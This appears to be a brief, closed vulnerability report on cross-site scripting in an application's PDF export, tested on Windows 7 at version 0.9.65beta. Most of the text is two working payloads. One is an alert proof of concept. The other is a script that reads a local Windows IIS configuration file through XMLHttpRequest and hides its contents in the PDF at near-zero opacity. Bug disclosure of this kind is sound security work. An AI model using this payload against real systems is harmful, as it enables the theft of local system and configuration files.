Closed
Description
Tested on Win7
Ver0.9.65beta
<script>alert(document.location)</script>
xss when exporting to PDF
and can resulting to information leak
<script>x=new XMLHttpRequest;x.onload=function(){document.write('\<font style="opacity:.01"\>'+this.responseText+'\<\/font\>')};x.open("GET","file:///C:/Windows/system32/inetsrv/MetaBase.xml");x.send();</script>